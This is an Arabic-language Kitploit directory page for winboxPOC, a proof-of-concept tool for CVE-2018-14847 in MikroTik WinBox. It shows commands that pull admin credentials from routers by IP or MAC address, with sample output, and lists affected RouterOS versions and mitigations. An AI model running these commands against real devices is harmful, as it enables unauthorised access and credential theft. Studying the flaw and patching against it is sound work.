Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
winboxPOC — إثبات المفهوم للثغرة الحرجة في Winbox (CVE-2018-14847) | Kitploit
أدوات/GitHubGitHub/tr33-he11/winboxpoc
الاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكات
GitHubtr33-he11/winboxpoc

winboxPOC

إثبات المفهوم للثغرة الحرجة في Winbox (CVE-2018-14847)

عرض المستودع
1منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WinboxExploit

هذا دليل على مفهوم الثغرة الحرجة في WinBox (CVE-2018-14847) والتي تسمح بقراءة تعسفية للملفات التي تحتوي على كلمات مرور نصية عادية.

المتطلبات

  • Python 3+

هذا السكربت لن يعمل مع Python 2.x أو إصدارات أقدم.

طريقة الاستخدام

السكربت بسيط ويُستخدم مع وسائط بسيطة في سطر الأوامر.

WinBox (TCP/IP)

استغل الثغرة واقرأ كلمة المرور.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

مثال:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC server WinBox (الطبقة 2)

يمكنك استخراج الملفات حتى إذا لم يكن للجهاز عنوان IP.

فحص اكتشاف بسيط لأجهزة Mikrotik المتصلة محليًا.

root@kitploit:~
python3 MACServerDiscover.py

مثال:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

استغل الثغرة واقرأ كلمة المرور.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

مثال:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

الإصدارات المعرضة للخطر

جميع إصدارات RouterOS من 2015-05-28 إلى 2018-04-20 معرضة لهذا الاستغلال.

أجهزة Mikrotik التي تعمل بإصدارات RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

لمزيد من المعلومات انظر: https://blog.mikrotik.com/security/winbox-vulnerability.html

تقنيات التخفيف

  • قم بترقية جهاز التوجيه إلى إصدار RouterOS يتضمن الإصلاح.
  • قم بتعطيل خدمة WinBox على جهاز التوجيه.
  • يمكنك تقييد الوصول إلى خدمة WinBox لعناوين IP محددة باستخدام ما يلي:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • يمكنك استخدام بعض قواعد التصفية (ACL) لمنع الوصول الخارجي إلى خدمة WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • يمكن تقييد الوصول إلى خدمة mac-winbox عن طريق تحديد الواجهات المسموح بها:
root@kitploit:~
/tool mac-server mac-winbox
تنزيل الأداة